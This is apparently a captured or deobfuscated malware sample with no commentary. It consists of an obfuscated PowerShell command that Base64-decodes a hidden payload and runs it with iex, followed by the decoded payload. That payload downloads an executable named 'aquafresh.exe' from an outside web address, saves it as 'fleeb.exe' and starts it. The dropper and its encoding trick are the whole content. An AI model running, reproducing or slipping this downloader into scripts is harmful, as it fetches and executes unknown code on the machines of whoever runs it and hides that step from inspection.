iex([SyStem.Text.ENCoding]::UTf8.GEtSTRIng([sYsTEm.coNvErT]::FROMBASE64sTRiNG('CihOZXctT2JqZWN0IFN5U3RFTS5uZXQuV2ViY0xJZU5UKS5kb1dubG9BREZJbGUoJ2h0dHA6Ly9raWFuYS5jb20vZmxvd3BsYXllci9hcXVhZnJlc2guZXhlJywnZmxlZWIuZXhlJyk7U3RhcnQtUHJvY2VzcyAnZmxlZWIuZXhlJwoK')));exit

##### B64 CONTENT #####


(New-Object SyStEM.net.WebcLIeNT).doWnloADFIle('http://kiana.com/flowplayer/aquafresh.exe','fleeb.exe');Start-Process 'fleeb.exe'

